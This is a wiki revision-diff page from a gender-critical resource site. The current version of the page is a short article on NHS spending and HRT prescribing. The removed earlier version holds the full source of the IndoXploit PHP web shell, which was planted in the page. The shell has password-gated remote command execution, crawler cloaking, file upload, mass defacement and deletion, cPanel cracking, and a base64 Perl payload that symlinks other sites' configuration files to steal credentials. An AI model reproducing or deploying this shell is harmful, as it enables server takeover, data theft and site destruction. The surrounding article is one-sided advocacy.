Gender Critical Resources

Resources for Resistance to the Doctrine of Gender Identity

User Tools

Site Tools


issues:cashing_in_on_trans

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
issues:cashing_in_on_trans [2017/09/22 16:06]
asd
issues:cashing_in_on_trans [2018/02/12 16:52] (current)
Line 1: Line 1:
-<?php +====== Cashing In On Trans ======
-session_start();​ +
-error_reporting(0);​ +
-set_time_limit(0);​ +
-@set_magic_quotes_runtime(0);​ +
-@clearstatcache();​ +
-@ini_set('​error_log',​NULL);​ +
-@ini_set('​log_errors',​0);​ +
-@ini_set('​max_execution_time',​0);​ +
-@ini_set('​output_buffering',​0);​ +
-@ini_set('​display_errors',​ 0);+
  
-$auth_pass = "​7b4939a8af28c814f0c757bb10f40d3d";​ // default: IndoXploit +There's money to be made from desperateunhappy possibly ill people.
-$color = "#​00ff00";​ +
-$default_action = 'FilesMan';​ +
-$default_use_ajax = true; +
-$default_charset = '​UTF-8';​ +
-if(!empty($_SERVER['​HTTP_USER_AGENT'​])) { +
-    $userAgents = array("​Googlebot"​"​Slurp",​ "​MSNBot",​ "​PycURL",​ "​facebookexternalhit",​ "​ia_archiver",​ "​crawler",​ "​Yandex",​ "​Rambler",​ "​Yahoo! Slurp",​ "​YahooSeeker",​ "​bingbot"​);​ +
-    if(preg_match('/' ​implode('​|',​ $userAgents) . '/​i',​ $_SERVER['​HTTP_USER_AGENT'​])) { +
-        header('​HTTP/​1.0 404 Not Found'​);​ +
-        exit; +
-    } +
-}+
  
-function login_shell() { +As of October ​ 2015 the NHS was spending £25m a year and planning to spend a lot more.
-?> +
-<​html>​ +
-<​head>​ +
-<​title>​IndoXploit</​title>​ +
-<style type="​text/​css">​ +
-html { +
- margin: 20px auto; +
- background:​ #000000; +
- color: green; +
- text-align:​ center; +
-+
-header { +
- color: green; +
- margin: 10px auto; +
-+
-input[type=password] { +
- width: 250px; +
- height: 25px; +
- color: red; +
- background:​ #000000; +
- border: 1px dotted green; +
- padding: 5px; +
- margin-left:​ 20px; +
- text-align:​ center; +
-+
-</​style>​ +
-</​head>​ +
-<​center>​ +
-<​header>​ +
- <​pre>​ +
- ​___________________________ +
-< root@indoxploit:​~#​ w00t??? > +
- ​--------------------------- +
-   ​\ ​        , ​       , +
-    \       /​( ​       )` +
-     ​\ ​     \ \___   / | +
-            /- _  `-/  ' +
-           (/\/ \ \   /\ +
-           / /   | `    \ +
-           O O   ) /    | +
-           ​`-^--'​`< ​    '​ +
-          (_.)  _  )   / +
-           ​`.___/​` ​   / +
-             ​`-----'​ / +
-<​----. ​    __ / __   \ +
-<​----|====O)))==) \) /==== +
-<​----' ​   `--' `.__,' \ +
-             ​| ​       | +
-              \       / +
-        ______( (_  / \______ +
-      ,' ​ ,​-----' ​  ​| ​       \ +
-      `--{__________) ​       \/+
  
- </​pre>​ +https://www.england.nhs.uk/2015/10/will-huxter-2/ 
-</​header>​ +
-<form method="​post">​ +
-<input type="​password"​ name="​pass">​ +
-</​form>​ +
-<?php +
-exit; +
-+
-if(!isset($_SESSION[md5($_SERVER['​HTTP_HOST'​])])) +
-    if( empty($auth_pass) || ( isset($_POST['​pass'​]) && (md5($_POST['​pass'​]) == $auth_pass) ) ) +
-        $_SESSION[md5($_SERVER['​HTTP_HOST'​])] = true; +
-    else +
-        login_shell();​ +
-if(isset($_GET['​file'​]) && ($_GET['​file'​] != ''​) && ($_GET['​act'​] == '​download'​)) { +
-    @ob_clean();​ +
-    $file = $_GET['​file'​];​ +
-    header('​Content-Description:​ File Transfer'​);​ +
-    header('​Content-Type:​ application/​octet-stream'​);​ +
-    header('​Content-Disposition:​ attachment; filename="'​.basename($file).'"'​);​ +
-    header('​Expires:​ 0'); +
-    header('​Cache-Control:​ must-revalidate'​);​ +
-    header('​Pragma:​ public'​);​ +
-    header('​Content-Length:​ ' . filesize($file));​ +
-    readfile($file);​ +
-    exit; +
-+
-?> +
-<​html>​ +
-<​head>​ +
-<​title>​IndoXploit</​title>​ +
-<meta name='​author'​ content='​IndoXploit'>​ +
-<meta charset="​UTF-8">​ +
-<style type='​text/​css'>​ +
-@import url(https://fonts.googleapis.com/​css?​family=Ubuntu);​ +
-html { +
-    background: #000000; +
-    color: #ffffff; +
-    font-family:​ '​Ubuntu';​ +
- font-size: 13px; +
- width: 100%; +
-+
-li { +
- display: inline; +
- margin: 5px; +
- padding: 5px; +
-+
-table, th, td { +
- border-collapse:​collapse;​ +
- font-family:​ Tahoma, Geneva, sans-serif;​ +
- background:​ transparent;​ +
- font-family:​ '​Ubuntu';​ +
- font-size: 13px; +
-+
-.table_home, .th_home, .td_home { +
- border: 1px solid #ffffff; +
-+
-th { +
- padding: 10px; +
-+
-a { +
- color: #ffffff; +
- text-decoration:​ none; +
-+
-a:hover { +
- color: gold; +
- text-decoration:​ underline;​ +
-+
-b { +
- color: gold; +
-+
-input[type=text],​ input[type=password],​input[type=submit] { +
- background:​ transparent;​  +
- color: #ffffff;  +
- border: 1px solid #ffffff;  +
- margin: 5px auto; +
- padding-left:​ 5px; +
- font-family:​ '​Ubuntu';​ +
- font-size: 13px; +
-+
-textarea { +
- border: 1px solid #ffffff; +
- width: 100%; +
- height: 400px; +
- padding-left:​ 5px; +
- margin: 10px auto; +
- resize: none; +
- background:​ transparent;​ +
- color: #ffffff; +
- font-family:​ '​Ubuntu';​ +
- font-size: 13px; +
-+
-select { +
- width: 152px; +
- background:​ #000000;  +
- color: lime;  +
- border: 1px solid #ffffff;  +
- margin: 5px auto; +
- padding-left:​ 5px; +
- font-family:​ '​Ubuntu';​ +
- font-size: 13px; +
-+
-option:​hover { +
- background:​ lime; +
- color: #000000; +
-+
-</style> +
-</head> +
-<?php +
-###############################################################################​ +
-// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini. +
-// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada. +
-// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri. +
-// Tanpa kalian kita tidak akan BESAR seperti sekarang. +
-// Greetz: All Member IndoXploit. & all my friends. +
-###############################################################################​ +
-function w($dir,​$perm) { +
- if(!is_writable($dir)) { +
- return "<​font color=red>"​.$perm."</​font>";​ +
- } else { +
- return "<​font color=lime>"​.$perm."</​font>";​ +
-+
-+
-function r($dir,​$perm) { +
- if(!is_readable($dir)) { +
- return "<​font color=red>"​.$perm."</​font>";​ +
- } else { +
- return "<​font color=lime>"​.$perm."</​font>";​ +
-+
-+
-function exe($cmd) { +
- if(function_exists('​system'​)) {  +
- @ob_start();​  +
- @system($cmd);​  +
- $buff = @ob_get_contents();​  +
- @ob_end_clean();​  +
- return $buff;  +
- } elseif(function_exists('​exec'​)) {  +
- @exec($cmd,​$results);​  +
- $buff = "";​  +
- foreach($results as $result) {  +
- $buff .= $result;  +
- } return $buff;  +
- } elseif(function_exists('​passthru'​)) {  +
- @ob_start();​  +
- @passthru($cmd);​  +
- $buff = @ob_get_contents();​  +
- @ob_end_clean();​  +
- return $buff;  +
- } elseif(function_exists('​shell_exec'​)) {  +
- $buff = @shell_exec($cmd);​  +
- return $buff;  +
- }  +
-+
-function perms($file){ +
- $perms = fileperms($file);​ +
- if (($perms & 0xC000) == 0xC000) { +
- // Socket +
- $info = '​s';​ +
- } elseif (($perms & 0xA000) == 0xA000) { +
- // Symbolic Link +
- $info = '​l';​ +
- } elseif (($perms & 0x8000) == 0x8000) { +
- // Regular +
- $info = '-'; +
- } elseif (($perms & 0x6000) == 0x6000) { +
- // Block special +
- $info = '​b';​ +
- } elseif (($perms & 0x4000) == 0x4000) { +
- // Directory +
- $info = '​d';​ +
- } elseif (($perms & 0x2000) == 0x2000) { +
- // Character special +
- $info = '​c';​ +
- } elseif (($perms & 0x1000) == 0x1000) { +
- // FIFO pipe +
- $info = '​p';​ +
- } else { +
- // Unknown +
- $info = '​u';​ +
-+
- // Owner +
- $info .= (($perms & 0x0100) ? '​r'​ : '​-'​);​ +
- $info .= (($perms & 0x0080) ? '​w'​ : '​-'​);​ +
- $info .= (($perms & 0x0040) ? +
- (($perms & 0x0800) ? '​s'​ : '​x'​ ) : +
- (($perms & 0x0800) ? '​S'​ : '​-'​));​ +
- // Group +
- $info .= (($perms & 0x0020) ? '​r'​ : '​-'​);​ +
- $info .= (($perms & 0x0010) ? '​w'​ : '​-'​);​ +
- $info .= (($perms & 0x0008) ? +
- (($perms & 0x0400) ? '​s'​ : '​x'​ ) : +
- (($perms & 0x0400) ? '​S'​ : '​-'​));​ +
- // World +
- $info .= (($perms & 0x0004) ? '​r'​ : '​-'​);​ +
- $info .= (($perms & 0x0002) ? '​w'​ : '​-'​);​ +
- $info .= (($perms & 0x0001) ? +
- (($perms & 0x0200) ? '​t'​ : '​x'​ ) : +
- (($perms & 0x0200) ? '​T'​ : '​-'​));​ +
- return $info; +
-+
-function hdd($s) { +
- if($s >= 1073741824) +
- return sprintf('​%1.2f',​$s / 1073741824 ).' GB'; +
- elseif($s >= 1048576) +
- return sprintf('​%1.2f',​$s / 1048576 ) .' MB'; +
- elseif($s >= 1024) +
- return sprintf('​%1.2f',​$s / 1024 ) .' KB'; +
- else +
- return $s .' B'; +
-+
-function ambilKata($param,​ $kata1, $kata2){ +
-    if(strpos($param,​ $kata1) === FALSE) return FALSE; +
-    if(strpos($param,​ $kata2) === FALSE) return FALSE; +
-    $start = strpos($param,​ $kata1) + strlen($kata1);​ +
-    $end = strpos($param,​ $kata2, $start); +
-    $return = substr($param,​ $start, $end - $start); +
-    return $return; +
-+
-function getsource($url) { +
-    $curl = curl_init($url);​ +
-    curl_setopt($curl,​ CURLOPT_RETURNTRANSFER,​ 1); +
-    curl_setopt($curl,​ CURLOPT_FOLLOWLOCATION,​ true); +
-    curl_setopt($curl,​ CURLOPT_SSL_VERIFYPEER,​ false); +
-    curl_setopt($curl,​ CURLOPT_SSL_VERIFYHOST,​ false); +
-    $content = curl_exec($curl);​ +
-    curl_close($curl);​ +
-    return $content; +
-+
-function bing($dork) { +
- $npage = 1; +
- $npages = 30000; +
- $allLinks = array(); +
- $lll = array(); +
- while($npage <= $npages) { +
-     $x = getsource("​http://​www.bing.com/​search?​q="​.$dork."&​first="​.$npage);​ +
-     if($x) { +
- preg_match_all('#<​h2><​a href="​(.*?​)"​ h="​ID#',​ $x, $findlink);​ +
- foreach ($findlink[1] as $fl) array_push($allLinks,​ $fl); +
- $npage = $npage + 10; +
- if (preg_match("​(first="​ . $npage . "&​amp)siU",​ $x, $linksuiv) == 0) break; +
- } else break; +
-+
- $URLs = array(); +
- foreach($allLinks as $url){ +
-     $exp = explode("/",​ $url); +
-     $URLs[] = $exp[2]; +
-+
- $array = array_filter($URLs);​ +
- $array = array_unique($array);​ +
-  $sss = count(array_unique($array));​ +
- foreach($array as $domain) { +
- echo $domain."​\n";​ +
-+
-+
-function reverse($url) { +
- $ch = curl_init("​http:​//​domains.yougetsignal.com/​domains.php"​);​ +
-   curl_setopt($ch,​ CURLOPT_RETURNTRANSFER,​ 1 ); +
-   curl_setopt($ch,​ CURLOPT_POSTFIELDS, ​ "​remoteAddress=$url&​ket="​);​ +
-   curl_setopt($ch,​ CURLOPT_HEADER,​ 0); +
-   curl_setopt($ch,​ CURLOPT_POST,​ 1); +
- $resp = curl_exec($ch);​ +
- $resp = str_replace("​[","",​ str_replace("​]","",​ str_replace("​\"​\"","",​ str_replace(",​ ,",",",​ str_replace("​{","",​ str_replace("​{","",​ str_replace("​}","",​ str_replace(",​ ",",",​ str_replace(",​ ",",", ​ str_replace("'","",​ str_replace("'","",​ str_replace(":",",",​ str_replace('"','',​ $resp ) ) ) ) ) ) ) ) ) )))); +
- $array = explode(",,",​ $resp); +
- unset($array[0]);​ +
- foreach($array as $lnk) { +
- $lnk = "​http://​$lnk";​ +
- $lnk = str_replace(",",​ "",​ $lnk); +
- echo $lnk."​\n";​ +
- ob_flush();​ +
- flush();​ +
-+
- curl_close($ch);​ +
-+
-if(get_magic_quotes_gpc()) { +
- function idx_ss($array) { +
- return is_array($array) ? array_map('​idx_ss',​ $array) : stripslashes($array);​ +
-+
- $_POST = idx_ss($_POST);​ +
- $_COOKIE = idx_ss($_COOKIE);​ +
-}+
  
-if(isset($_GET['​dir'​])) { +===== UK GP giving HRT after phone consultation ​=====
- $dir $_GET['​dir'​];​ +
- chdir($dir);​ +
-} else { +
- $dir getcwd(); +
-+
-$kernel ​php_uname();​ +
-$ip gethostbyname($_SERVER['​HTTP_HOST'​]);​ +
-$dir str_replace("​\\","/",​$dir);​ +
-$scdir ​explode("/",​ $dir); +
-$freespace ​hdd(disk_free_space("/"​));​ +
-$total ​hdd(disk_total_space("/"​));​ +
-$used $total - $freespace;​ +
-$sm (@ini_get(strtolower("​safe_mode"​)) == '​on'​) ? "<​font color=red>​ON</​font>"​ : "<​font color=lime>​OFF</​font>";​ +
-$ds = @ini_get("​disable_functions"​);​ +
-$mysql = (function_exists('​mysql_connect'​)) ? "<​font color=lime>​ON</​font>"​ : "<​font color=red>​OFF</​font>";​ +
-$curl = (function_exists('​curl_version'​)) ? "<​font color=lime>​ON</​font>"​ : "<​font color=red>​OFF</​font>";​ +
-$wget = (exe('​wget --help'​)) ? "<​font color=lime>​ON</​font>"​ : "<​font color=red>​OFF</​font>";​ +
-$perl = (exe('​perl --help'​)) ? "<​font color=lime>​ON</​font>"​ : "<​font color=red>​OFF</​font>";​ +
-$python = (exe('​python --help'​)) ? "<​font color=lime>​ON</​font>"​ : "<​font color=red>​OFF</​font>";​ +
-$show_ds = (!empty($ds)) ? "<​font color=red>​$ds</​font>"​ : "<​font color=lime>​NONE</​font>";​ +
-if(!function_exists('​posix_getegid'​)) { +
- $user = @get_current_user();​ +
- $uid = @getmyuid();​ +
- $gid = @getmygid();​ +
- $group = "?";​ +
-} else { +
- $uid = @posix_getpwuid(posix_geteuid());​ +
- $gid = @posix_getgrgid(posix_getegid());​ +
- $user = $uid['​name'​];​ +
- $uid = $uid['​uid'​];​ +
- $group = $gid['​name'​];​ +
- $gid = $gid['​gid'​];​ +
-+
-echo "​System:​ <font color=lime>"​.$kernel."</​font><​br>";​ +
-echo "User: <font color=lime>"​.$user."</​font>​ ("​.$uid."​) Group: <font color=lime>"​.$group."</​font>​ ("​.$gid."​)<​br>";​ +
-echo "​Server IP: <font color=lime>"​.$ip."</​font>​ | Your IP: <font color=lime>"​.$_SERVER['​REMOTE_ADDR'​]."</​font><​br>";​ +
-echo "HDD: <font color=lime>​$used</​font>​ / <font color=lime>​$total</​font>​ ( Free: <font color=lime>​$freespace</​font>​ )<​br>";​ +
-echo "Safe Mode: $sm<​br>";​ +
-echo "​Disable Functions: $show_ds<​br>";​ +
-echo "​MySQL:​ $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <​br>";​ +
-echo "​Current DIR: "; +
-foreach($scdir as $c_dir => $cdir) {  +
- echo "<a href='?​dir=";​ +
- for($i = 0; $i <= $c_dir; $i++) { +
- echo $scdir[$i];​ +
- if($i != $c_dir) { +
- echo "/";​ +
-+
-+
- echo "'>​$cdir</​a>/";​ +
-+
-echo "&​nbsp;&​nbsp;​[ "​.w($dir,​ perms($dir))."​ ]"; +
-echo "<​hr>";​ +
-echo "<​center>";​ +
-echo "<​ul>";​ +
-echo "<​li>​[ <a href='?'>​Home</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=upload'>​Upload</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=cmd'>​Command</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=mass_deface'>​Mass Deface</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=mass_delete'>​Mass Delete</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=config'>​Config</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=jumping'>​Jumping</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=cpanel'>​CPanel Crack</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=smtp'>​SMTP Grabber</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=zoneh'>​Zone-H</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=cgi'>​CGI Telnet</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=network'>​network</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=adminer'>​Adminer</​a>​ ]</​li><​br>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=fake_root'>​Fake Root</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=auto_edit_user'>​Auto Edit User</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=auto_wp'>​Auto Edit Title WordPress</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=auto_dwp'>​WordPress Auto Deface</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=auto_dwp2'>​WordPress Auto Deface V.2</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=cpftp_auto'>​CPanel/​FTP Auto Deface</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a href='?​dir=$dir&​do=krdp_shell'>​K-RDP Shell</​a>​ ]</​li>";​ +
-echo "<​li>​[ <a style='​color:​ red;' href='?​logout=true'>​Logout</​a>​ ]</​li>";​ +
-echo "</​ul>";​ +
-echo "</​center>";​ +
-echo "<​hr>";​ +
-if($_GET['​logout'​] == true) { +
- unset($_SESSION[md5($_SERVER['​HTTP_HOST'​])]);​ +
- echo "<​script>​window.location='?';</​script>";​ +
-} elseif($_GET['​do'​] == '​upload'​) { +
- echo "<​center>";​ +
- if($_POST['​upload'​]) { +
- if($_POST['​tipe_upload'​] == '​biasa'​) { +
- if(@copy($_FILES['​ix_file'​]['​tmp_name'​],​ "​$dir/"​.$_FILES['​ix_file'​]['​name'​].""​)) { +
- $act = "<​font color=lime>​Uploaded!</​font>​ at <​i><​b>​$dir/"​.$_FILES['​ix_file'​]['​name'​]."</​b></​i>";​ +
- } else { +
- $act = "<​font color=red>​failed to upload file</​font>";​ +
-+
- } else { +
- $root = $_SERVER['​DOCUMENT_ROOT'​]."/"​.$_FILES['​ix_file'​]['​name'​];​ +
- $web = $_SERVER['​HTTP_HOST'​]."/"​.$_FILES['​ix_file'​]['​name'​];​ +
- if(is_writable($_SERVER['​DOCUMENT_ROOT'​])) { +
- if(@copy($_FILES['​ix_file'​]['​tmp_name'​],​ $root)) { +
- $act = "<​font color=lime>​Uploaded!</​font>​ at <​i><​b>​$root -> </​b></​i><​a href='​http://​$web'​ target='​_blank'>​$web</​a>";​ +
- } else { +
- $act = "<​font color=red>​failed to upload file</​font>";​ +
-+
- } else { +
- $act = "<​font color=red>​failed to upload file</​font>";​ +
-+
-+
-+
- echo "​Upload File: +
- <form method='​post'​ enctype='​multipart/​form-data'>​ +
- <input type='​radio'​ name='​tipe_upload'​ value='​biasa'​ checked>​Biasa [ "​.w($dir,"​Writeable"​)."​ ]  +
- <input type='​radio'​ name='​tipe_upload'​ value='​home_root'>​home_root [ "​.w($_SERVER['​DOCUMENT_ROOT'​],"​Writeable"​)."​ ]<​br>​ +
- <input type='​file'​ name='​ix_file'>​ +
- <input type='​submit'​ value='​upload'​ name='​upload'>​ +
- </​form>";​ +
- echo $act; +
- echo "</​center>";​ +
-} elseif($_GET['​do'​] == '​cmd'​) { +
- echo "<​form method='​post'>​ +
- <font style='​text-decoration:​ underline;'>"​.$user."​@"​.$ip.":​ ~ $ </​font>​ +
- <input type='​text'​ size='​30'​ height='​10'​ name='​cmd'><​input type='​submit'​ name='​do_cmd'​ value='>>'>​ +
- </​form>";​ +
- if($_POST['​do_cmd'​]) { +
- echo "<​pre>"​.exe($_POST['​cmd'​])."</​pre>";​ +
-+
-} elseif($_GET['​do'​] == '​mass_deface'​) { +
- function sabun_massal($dir,​$namafile,​$isi_script) { +
- if(is_writable($dir)) { +
- $dira = scandir($dir);​ +
- foreach($dira as $dirb) { +
- $dirc = "​$dir/​$dirb";​ +
- $lokasi = $dirc.'/'​.$namafile;​ +
- if($dirb === '​.'​) { +
- file_put_contents($lokasi,​ $isi_script);​ +
- } elseif($dirb === '​..'​) { +
- file_put_contents($lokasi,​ $isi_script);​ +
- } else { +
- if(is_dir($dirc)) { +
- if(is_writable($dirc)) { +
- echo "​[<​font color=lime>​DONE</​font>​] $lokasi<​br>";​ +
- file_put_contents($lokasi,​ $isi_script);​ +
- $idx = sabun_massal($dirc,​$namafile,​$isi_script);​ +
-+
-+
-+
-+
-+
-+
- function sabun_biasa($dir,​$namafile,​$isi_script) { +
- if(is_writable($dir)) { +
- $dira = scandir($dir);​ +
- foreach($dira as $dirb) { +
- $dirc = "​$dir/​$dirb";​ +
- $lokasi = $dirc.'/'​.$namafile;​ +
- if($dirb === '​.'​) { +
- file_put_contents($lokasi,​ $isi_script);​ +
- } elseif($dirb === '​..'​) { +
- file_put_contents($lokasi,​ $isi_script);​ +
- } else { +
- if(is_dir($dirc)) { +
- if(is_writable($dirc)) { +
- echo "​[<​font color=lime>​DONE</​font>​] $dirb/​$namafile<​br>";​ +
- file_put_contents($lokasi,​ $isi_script);​ +
-+
-+
-+
-+
-+
-+
- if($_POST['​start'​]) { +
- if($_POST['​tipe_sabun'​] == '​mahal'​) { +
- echo "<​div style='​margin:​ 5px auto; padding: 5px'>";​ +
- sabun_massal($_POST['​d_dir'​],​ $_POST['​d_file'​],​ $_POST['​script'​]);​ +
- echo "</​div>";​ +
- } elseif($_POST['​tipe_sabun'​] == '​murah'​) { +
- echo "<​div style='​margin:​ 5px auto; padding: 5px'>";​ +
- sabun_biasa($_POST['​d_dir'​],​ $_POST['​d_file'​],​ $_POST['​script'​]);​ +
- echo "</​div>";​ +
-+
- } else { +
- echo "<​center>";​ +
- echo "<​form method='​post'>​ +
- <font style='​text-decoration:​ underline;'>​Tipe Sabun:</​font><​br>​ +
- <input type='​radio'​ name='​tipe_sabun'​ value='​murah'​ checked>​Biasa<​input type='​radio'​ name='​tipe_sabun'​ value='​mahal'>​Massal<​br>​ +
- <font style='​text-decoration:​ underline;'>​Folder:</​font><​br>​ +
- <input type='​text'​ name='​d_dir'​ value='​$dir'​ style='​width:​ 450px;'​ height='​10'><​br>​ +
- <font style='​text-decoration:​ underline;'>​Filename:</​font><​br>​ +
- <input type='​text'​ name='​d_file'​ value='​index.php'​ style='​width:​ 450px;'​ height='​10'><​br>​ +
- <font style='​text-decoration:​ underline;'>​Index File:</​font><​br>​ +
- <​textarea name='​script'​ style='​width:​ 450px; height: 200px;'>​Hacked by IndoXploit</​textarea><​br>​ +
- <input type='​submit'​ name='​start'​ value='​Mass Deface'​ style='​width:​ 450px;'>​ +
- </​form></​center>";​ +
-+
-} elseif($_GET['​do'​] == '​mass_delete'​) { +
- function hapus_massal($dir,​$namafile) { +
- if(is_writable($dir)) { +
- $dira = scandir($dir);​ +
- foreach($dira as $dirb) { +
- $dirc = "​$dir/​$dirb";​ +
- $lokasi = $dirc.'/'​.$namafile;​ +
- if($dirb === '​.'​) { +
- if(file_exists("​$dir/​$namafile"​)) { +
- unlink("​$dir/​$namafile"​);​ +
-+
- } elseif($dirb === '​..'​) { +
- if(file_exists(""​.dirname($dir)."/​$namafile"​)) { +
- unlink(""​.dirname($dir)."/​$namafile"​);​ +
-+
- } else { +
- if(is_dir($dirc)) { +
- if(is_writable($dirc)) { +
- if(file_exists($lokasi)) { +
- echo "​[<​font color=lime>​DELETED</​font>​] $lokasi<​br>";​ +
- unlink($lokasi);​ +
- $idx = hapus_massal($dirc,​$namafile);​ +
-+
-+
-+
-+
-+
-+
-+
- if($_POST['​start'​]) { +
- echo "<​div style='​margin:​ 5px auto; padding: 5px'>";​ +
- hapus_massal($_POST['​d_dir'​],​ $_POST['​d_file'​]);​ +
- echo "</​div>";​ +
- } else { +
- echo "<​center>";​ +
- echo "<​form method='​post'>​ +
- <font style='​text-decoration:​ underline;'>​Folder:</​font><​br>​ +
- <input type='​text'​ name='​d_dir'​ value='​$dir'​ style='​width:​ 450px;'​ height='​10'><​br>​ +
- <font style='​text-decoration:​ underline;'>​Filename:</​font><​br>​ +
- <input type='​text'​ name='​d_file'​ value='​index.php'​ style='​width:​ 450px;'​ height='​10'><​br>​ +
- <input type='​submit'​ name='​start'​ value='​Mass Delete'​ style='​width:​ 450px;'>​ +
- </​form></​center>";​ +
-+
-} elseif($_GET['​do'​] == '​config'​) { +
- $idx = mkdir("​idx_config",​ 0777); +
- $isi_htc = "​Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/​x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";​ +
- $htc = fopen("​idx_config/​.htaccess","​w"​);​ +
- fwrite($htc,​ $isi_htc);​ +
- fclose($htc);​ +
- if(preg_match("/​vhosts|vhost/",​ $dir)) { +
- $link_config = str_replace($_SERVER['​DOCUMENT_ROOT'​],​ "",​ $dir); +
- $vhost = "​IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8n